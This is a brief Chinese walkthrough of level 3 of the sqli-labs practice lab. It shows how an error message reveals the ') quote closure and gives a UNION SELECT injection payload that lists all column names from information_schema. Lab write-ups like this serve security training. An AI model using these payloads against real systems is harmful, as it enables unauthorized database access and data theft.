sqli_labs 3
输入id=3’ 得到报错信息:‘3’’) 。报错信息中的3’ 是我输入的内容,由此可以推断语法中的闭合语句是(’ ‘)。
输入id= 3’) --+。发现不报错
输入id=3’) and 0 --+ 。
通过以上分析,可以知道注入点。这样便可以进行注入了。
?id=33’) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+
使用union联合查询的时候,union前面的内容要为假 用-1 或者比较大的数,比如30,40都可以。
这个语句查询的内容是当前数据库中的所有表的列名。